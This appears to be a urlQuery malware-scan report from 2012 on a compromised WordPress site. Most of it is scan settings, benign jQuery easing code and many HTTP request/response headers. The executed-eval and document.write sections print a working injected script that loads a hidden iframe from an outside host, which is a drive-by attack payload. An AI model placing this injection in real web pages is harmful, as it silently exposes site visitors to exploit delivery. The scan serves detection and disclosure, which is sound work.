Overview

URLhttp://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
IP74.208.85.43
ASNAS8560 1&1 Internet AG
Location United States
Report completed2012-11-06 21:02:07 CET
StatusLoading report..
urlQuery Alerts Detected malicious iframe injection


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader8.0
Java1.6.0_26


Intrusion Detection Systems

Suricata /w Emerging Threats Pro No alerts detected
Snort /w Sourcefire VRT No alerts detected


Recent reports on same IP/ASN/Domain

Last 6 reports on ASN: AS8560 1&1 Internet AG

Date Alerts / IDS URL IP
2013-02-23 00:13:081 / 2http://rottis.gmxhome.de/Homepage/hunde/diona3_eng.htm82.165.62.86
2013-02-23 00:10:162 / 3http://www.the-teach-girls.de/page5.php?messagePage=84682.165.58.42
2013-02-23 00:08:441 / 2http://www.turbopinto.com/index.php?action=;board=16.074.208.86.29
2013-02-23 00:07:182 / 3http://latoksoluciones.com/?page_id=448217.160.246.226
2013-02-23 00:06:531 / 12http://greengardenchristianschool.com/author/admin74.208.237.148
2013-02-23 00:03:071 / 1http://www.transportesmadridhaba.es/index.php?option=com_content87.106.157.229



JavaScript

Executed Scripts (16)


Executed Evals (2)

#1 JavaScript::Eval (size: 595, repeated: 1) - Alert detect on script (Severity: 2)

		if (document.getElementsByTagName('body')[0]) {
		    iframer();
		} else {
		    document.write("<iframe src='http://hyzisfssja.ontheweb.nu/t/vc.php?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
		}
		function iframer() {
		    var f = document.createElement('iframe');
		    f.setAttribute('src', 'http://hyzisfssja.ontheweb.nu/t/vc.php?go=2');
		    f.style.visibility = 'hidden';
		    f.style.position = 'absolute';
		    f.style.left = '0';
		    f.style.top = '0';
		    f.setAttribute('width', '10');
		    f.setAttribute('height', '10');
		    document.getElementsByTagName('body')[0].appendChild(f);
		}

#2 JavaScript::Eval (size: 3561, repeated: 1)

jQuery.easing['jswing'] = jQuery.easing['swing'];
jQuery.extend(jQuery.easing, {
    def: 'easeOutQuad',
    swing: function(x, t, b, c, d) {
        return jQuery.easing[jQuery.easing.def](x, t, b, c, d)
    },
    easeInQuad: function(x, t, b, c, d) {
        return c * (t /= d) * t + b
    },
    easeOutQuad: function(x, t, b, c, d) {
        return -c * (t /= d) * (t - 2) + b
    },
    easeInOutQuad: function(x, t, b, c, d) {
        if ((t /= d / 2) < 1) return c / 2 * t * t + b;
        return -c / 2 * ((--t) * (t - 2) - 1) + b
    },
    easeInCubic: function(x, t, b, c, d) {
        return c * (t /= d) * t * t + b
    },
    easeOutCubic: function(x, t, b, c, d) {
        return c * ((t = t / d - 1) * t * t + 1) + b
    },
    easeInOutCubic: function(x, t, b, c, d) {
        if ((t /= d / 2) < 1) return c / 2 * t * t * t + b;
        return c / 2 * ((t -= 2) * t * t + 2) + b
    },
    easeInQuart: function(x, t, b, c, d) {
        return c * (t /= d) * t * t * t + b
    },
    easeOutQuart: function(x, t, b, c, d) {
        return -c * ((t = t / d - 1) * t * t * t - 1) + b
    },
    easeInOutQuart: function(x, t, b, c, d) {
        if ((t /= d / 2) < 1) return c / 2 * t * t * t * t + b;
        return -c / 2 * ((t -= 2) * t * t * t - 2) + b
    },
    easeInQuint: function(x, t, b, c, d) {
        return c * (t /= d) * t * t * t * t + b
    },
    easeOutQuint: function(x, t, b, c, d) {
        return c * ((t = t / d - 1) * t * t * t * t + 1) + b
    },
    easeInOutQuint: function(x, t, b, c, d) {
        if ((t /= d / 2) < 1) return c / 2 * t * t * t * t * t + b;
        return c / 2 * ((t -= 2) * t * t * t * t + 2) + b
    },
    easeInSine: function(x, t, b, c, d) {
        return -c * Math.cos(t / d * (Math.PI / 2)) + c + b
    },
    easeOutSine: function(x, t, b, c, d) {
        return c * Math.sin(t / d * (Math.PI / 2)) + b
    },
    easeInOutSine: function(x, t, b, c, d) {
        return -c / 2 * (Math.cos(Math.PI * t / d) - 1) + b
    },
    easeInExpo: function(x, t, b, c, d) {
        return (t == 0) ? b : c * Math.pow(2, 10 * (t / d - 1)) + b
    },
    easeOutExpo: function(x, t, b, c, d) {
        return (t == d) ? b + c : c * (-Math.pow(2, -10 * t / d) + 1) + b
    },
    easeInOutExpo: function(x, t, b, c, d) {
        if (t == 0) return b;
        if (t == d) return b + c;
        if ((t /= d / 2) < 1) return c / 2 * Math.pow(2, 10 * (t - 1)) + b;
        return c / 2 * (-Math.pow(2, -10 * --t) + 2) + b
    },
    easeInCirc: function(x, t, b, c, d) {
        return -c * (Math.sqrt(1 - (t /= d) * t) - 1) + b
    },
    easeOutCirc: function(x, t, b, c, d) {
        return c * Math.sqrt(1 - (t = t / d - 1) * t) + b
    },
    easeInOutCirc: function(x, t, b, c, d) {
        if ((t /= d / 2) < 1) return -c / 2 * (Math.sqrt(1 - t * t) - 1) + b;
        return c / 2 * (Math.sqrt(1 - (t -= 2) * t) + 1) + b
    },
    easeInElastic: function(x, t, b, c, d) {
        var s = 1.70158;
        var p = 0;
        var a = c;
        if (t == 0) return b;
        if ((t /= d) == 1) return b + c;
        if (!p) p = d * .3;
        if (a < Math.abs(c)) {
            a = c;
            var s = p / 4
        } else var s = p / (2 * Math.PI) * Math.asin(c / a);
        return -(a * Math.pow(2, 10 * (t -= 1)) * Math.sin((t * d - s) * (2 * Math.PI) / p)) + b
    },
    easeOutElastic: function(x, t, b, c, d) {
        var s = 1.70158;
        var p = 0;
        var a = c;
        if (t == 0) return b;
        if ((t /= d) == 1) return b + c;
        if (!p) p = d * .3;
        if (a < Math.abs(c)) {
            a = c;
            var s = p / 4
        } else var s = p / (2 * Math.PI) * Math.asin(c / a);
        return a * Math.pow(2, -10 * t) * Math.sin((t * d - s) * (2 * Math.PI) / p) + c + b
    },
    easeInOutElastic: function(x, t, b, c, d) {
        var s = 1.70158;
        var p = 0;
        var a = c;
        if (t == 0) return b;
        if ((t /= d / 2) == 2) return b + c;
        if (!p) p = d * (.3 * 1.5);
        if (a < Math.abs(c)) {
            a = c;
            var s = p / 4
        } else var s = p / (2 * Math.PI) * Math.asin(c / a);
        if (t < 1) return -.5 * (a * Math.pow(2, 10 * (t -= 1)) * Math.sin((t * d - s) * (2 * Math.PI) / p)) + b;
        return a * Math.pow(2, -10 * (t -= 1)) * Math.sin((t * d - s) * (2 * Math.PI) / p) * .5 + c + b
    },
    easeInBack: function(x, t, b, c, d, s) {
        if (s == undefined) s = 1.70158;
        return c * (t /= d) * t * ((s + 1) * t - s) + b
    },
    easeOutBack: function(x, t, b, c, d, s) {
        if (s == undefined) s = 1.70158;
        return c * ((t = t / d - 1) * t * ((s + 1) * t + s) + 1) + b
    },
    easeInOutBack: function(x, t, b, c, d, s) {
        if (s == undefined) s = 1.70158;
        if ((t /= d / 2) < 1) return c / 2 * (t * t * (((s *= (1.525)) + 1) * t - s)) + b;
        return c / 2 * ((t -= 2) * t * (((s *= (1.525)) + 1) * t + s) + 2) + b
    },
    easeInBounce: function(x, t, b, c, d) {
        return c - jQuery.easing.easeOutBounce(x, d - t, 0, c, d) + b
    },
    easeOutBounce: function(x, t, b, c, d) {
        if ((t /= d) < (1 / 2.75)) {
            return c * (7.5625 * t * t) + b
        } else if (t < (2 / 2.75)) {
            return c * (7.5625 * (t -= (1.5 / 2.75)) * t + .75) + b
        } else if (t < (2.5 / 2.75)) {
            return c * (7.5625 * (t -= (2.25 / 2.75)) * t + .9375) + b
        } else {
            return c * (7.5625 * (t -= (2.625 / 2.75)) * t + .984375) + b
        }
    },
    easeInOutBounce: function(x, t, b, c, d) {
        if (t < d / 2) return jQuery.easing.easeInBounce(x, t * 2, 0, c, d) * .5 + b;
        return jQuery.easing.easeOutBounce(x, t * 2 - d, 0, c, d) * .5 + c * .5 + b
    }
});

Executed Writes (1)

#1 JavaScript::Write (size: 148, repeated: 1)

<iframe src='http://hyzisfssja.ontheweb.nu/t/vc.php?go=2' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>


HTTP Transactions (37)


Request Response
GET /favicon.ico HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/vnd.microsoft.icon
Date: Tue, 06 Nov 2012 20:01:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Length: 0
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
GET /wp-content/themes/barelycorporate/style.css HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 20:01:38 GMT
Server: Apache
Last-Modified: Thu, 18 Oct 2012 02:13:43 GMT
Etag: &quot;bfc8b1-1b8-4cc4befb765d0&quot;
Accept-Ranges: bytes
Content-Length: 440
Keep-Alive: timeout=2, max=199
Connection: Keep-Alive
GET /wp-content/uploads/2011/11/joshua_fall_t.jpg HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Date: Tue, 06 Nov 2012 20:01:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://naomisvillage.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 06 Nov 2012 20:01:38 GMT
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /wp-content/themes/barelycorporate/framework/frontend/assets/css/plugins.css?ver=3.4.2 HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 20:01:39 GMT
Server: Apache
Last-Modified: Sun, 19 Aug 2012 22:15:41 GMT
Etag: &quot;306fd5a-46d-4c7a5bbd1784d&quot;
Accept-Ranges: bytes
Content-Length: 1133
Keep-Alive: timeout=2, max=198
Connection: Keep-Alive
GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=3.3 HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 20:01:39 GMT
Server: Apache
Last-Modified: Fri, 28 Sep 2012 17:59:59 GMT
Etag: &quot;c60fad-377-4cac6d3005999&quot;
Accept-Ranges: bytes
Content-Length: 887
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
GET /wp-content/plugins/facebook-page-photo-gallery/css/basic.css?ver=3.4.2 HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 20:01:39 GMT
Server: Apache
Last-Modified: Sun, 19 Aug 2012 22:14:16 GMT
Etag: &quot;1fca2cdf-5bc-4c7a5b6c2300a&quot;
Accept-Ranges: bytes
Content-Length: 1468
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
GET /wp-content/plugins/theme-blvd-responsive-google-maps/assets/style.css?ver=1.0 HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 20:01:39 GMT
Server: Apache
Last-Modified: Wed, 22 Aug 2012 00:15:39 GMT
Etag: &quot;23ad2941-2c-4c7cfa4855543&quot;
Accept-Ranges: bytes
Content-Length: 44
Keep-Alive: timeout=2, max=197
Connection: Keep-Alive
GET /wp-content/themes/barelycorporate/assets/css/responsive.min.css?ver=1.0 HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 20:01:39 GMT
Server: Apache
Last-Modified: Sun, 19 Aug 2012 22:15:41 GMT
Etag: &quot;30720ee-fff-4c7a5bbcfd25e&quot;
Accept-Ranges: bytes
Content-Length: 4095
Keep-Alive: timeout=2, max=199
Connection: Keep-Alive
GET /wp-content/plugins/facebook-page-photo-gallery/walleriboxlite/jquery.easing-1.3.pack.js?ver=1.3 HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Tue, 06 Nov 2012 20:01:39 GMT
Server: Apache
Last-Modified: Sun, 19 Aug 2012 22:14:16 GMT
Etag: &quot;1fca2cf0-1a3d-4c7a5b6c29d6d&quot;
Accept-Ranges: bytes
Content-Length: 6717
Keep-Alive: timeout=2, max=198
Connection: Keep-Alive
GET /wp-content/plugins/facebook-page-photo-gallery/fppg-walleriboxlite.css.php?ver=1.3.4 HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: text/css; charset=utf-8
Date: Tue, 06 Nov 2012 20:01:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Transfer-Encoding: chunked
GET /wp-content/themes/barelycorporate/framework/frontend/assets/css/themeblvd.css?ver=3.4.2 HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 20:01:39 GMT
Server: Apache
Last-Modified: Sun, 19 Aug 2012 22:15:41 GMT
Etag: &quot;306f8d6-8fd0-4c7a5bbd1784d&quot;
Accept-Ranges: bytes
Content-Length: 36816
Keep-Alive: timeout=2, max=199
Connection: Keep-Alive
GET /wp-content/plugins/facebook-page-photo-gallery/walleriboxlite/jquery.mousewheel-3.0.4.pack.js?ver=3.0.4 HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Tue, 06 Nov 2012 20:01:39 GMT
Server: Apache
Last-Modified: Sun, 19 Aug 2012 22:14:16 GMT
Etag: &quot;1fca2d42-4ff-4c7a5b6c2ad0d&quot;
Accept-Ranges: bytes
Content-Length: 1279
Keep-Alive: timeout=2, max=197
Connection: Keep-Alive
GET /wp-content/themes/barelycorporate/framework/frontend/assets/plugins/prettyphoto/css/prettyPhoto.css?ver=3.4.2 HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 20:01:39 GMT
Server: Apache
Last-Modified: Sun, 19 Aug 2012 22:15:41 GMT
Etag: &quot;bfc9f4-4db0-4c7a5bbd550c9&quot;
Accept-Ranges: bytes
Content-Length: 19888
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
GET /wp-content/plugins/theme-blvd-responsive-google-maps/assets/jquery.gmap.min.js?ver=3.0 HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Tue, 06 Nov 2012 20:01:39 GMT
Server: Apache
Last-Modified: Wed, 22 Aug 2012 00:15:39 GMT
Etag: &quot;23ad28c1-ef5-4c7cfa48545a2&quot;
Accept-Ranges: bytes
Content-Length: 3829
Keep-Alive: timeout=2, max=198
Connection: Keep-Alive
GET /wp-content/themes/barelycorporate/framework/frontend/assets/js/superfish.js?ver=1.4.8 HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Tue, 06 Nov 2012 20:01:39 GMT
Server: Apache
Last-Modified: Sun, 19 Aug 2012 22:15:41 GMT
Etag: &quot;bfc9ee-bf4-4c7a5bbd54128&quot;
Accept-Ranges: bytes
Content-Length: 3060
Keep-Alive: timeout=2, max=199
Connection: Keep-Alive
GET /wp-content/themes/barelycorporate/framework/frontend/assets/js/flexslider-2.js?ver=2.0 HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Tue, 06 Nov 2012 20:01:39 GMT
Server: Apache
Last-Modified: Sun, 19 Aug 2012 22:15:41 GMT
Etag: &quot;bfc9e4-3ee4-4c7a5bbd54128&quot;
Accept-Ranges: bytes
Content-Length: 16100
Keep-Alive: timeout=2, max=197
Connection: Keep-Alive
GET /wp-content/themes/barelycorporate/assets/css/theme.min.css?ver=1.0 HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: text/css
Date: Tue, 06 Nov 2012 20:01:39 GMT
Server: Apache
Last-Modified: Mon, 20 Aug 2012 02:25:08 GMT
Etag: &quot;30720f6-6732-4c7a937eec8e1&quot;
Accept-Ranges: bytes
Content-Length: 26418
Keep-Alive: timeout=2, max=199
Connection: Keep-Alive
GET /wp-content/plugins/facebook-page-photo-gallery/walleriboxlite/jquery.walleriboxlite-1.3.4.pack.js?ver=1.3.4 HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Tue, 06 Nov 2012 20:01:39 GMT
Server: Apache
Last-Modified: Sun, 19 Aug 2012 22:14:16 GMT
Etag: &quot;1fca2cff-7ca9-4c7a5b6c2ad0d&quot;
Accept-Ranges: bytes
Content-Length: 31913
Keep-Alive: timeout=2, max=199
Connection: Keep-Alive
GET /wp-content/themes/barelycorporate/framework/frontend/assets/js/prettyphoto.js?ver=3.1.3 HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Tue, 06 Nov 2012 20:01:39 GMT
Server: Apache
Last-Modified: Sun, 19 Aug 2012 22:15:41 GMT
Etag: &quot;bfc9ea-57cd-4c7a5bbd54128&quot;
Accept-Ranges: bytes
Content-Length: 22477
Keep-Alive: timeout=2, max=196
Connection: Keep-Alive
GET /wp-content/themes/barelycorporate/framework/frontend/assets/js/roundabout.js?ver=1.1 HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Tue, 06 Nov 2012 20:01:39 GMT
Server: Apache
Last-Modified: Sun, 19 Aug 2012 22:15:41 GMT
Etag: &quot;bfc9ed-44ca-4c7a5bbd54128&quot;
Accept-Ranges: bytes
Content-Length: 17610
Keep-Alive: timeout=2, max=198
Connection: Keep-Alive
GET /wp-includes/js/jquery/jquery.js?ver=1.7.2 HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Tue, 06 Nov 2012 20:01:39 GMT
Server: Apache
Last-Modified: Fri, 28 Sep 2012 19:17:48 GMT
Etag: &quot;1fca27ab-1728d-4cac7e9577a0a&quot;
Accept-Ranges: bytes
Content-Length: 94861
Keep-Alive: timeout=2, max=196
Connection: Keep-Alive
GET /css?family=Josefin+Sans HTTP/1.1

Host: fonts.googleapis.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: text/css
Expires: Tue, 06 Nov 2012 20:01:40 GMT
Date: Tue, 06 Nov 2012 20:01:40 GMT
Cache-Control: private, max-age=86400
Content-Length: 274
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
GET /wp-content/themes/barelycorporate/framework/frontend/assets/js/themeblvd.js?ver=1.0 HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Tue, 06 Nov 2012 20:01:40 GMT
Server: Apache
Last-Modified: Sun, 19 Aug 2012 22:15:41 GMT
Etag: &quot;bfc9f0-835-4c7a5bbd54128&quot;
Accept-Ranges: bytes
Content-Length: 2101
Keep-Alive: timeout=2, max=196
Connection: Keep-Alive
GET /wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=3.3 HTTP/1.1

Host: naomisvillage.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://naomisvillage.com/wp-content/uploads/2011/11/joshua_fall_t.jpg
HTTP/1.1 200 OK

Content-Type: application/x-javascript
Date: Tue, 06 Nov 2012 20:01:40 GMT
Server: Apache
Last-Modified: Fri, 28 Sep 2012 17:59:59 GMT
Etag: &quot;c60fb3-1acb-4cac6d300693a&quot;
Accept-Ranges: bytes
Content-Length: 6859
Keep-Alive: timeout=2, max=195
Connection: Keep-Alive
GET /wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js?ver=3.15 HTTP/1.1

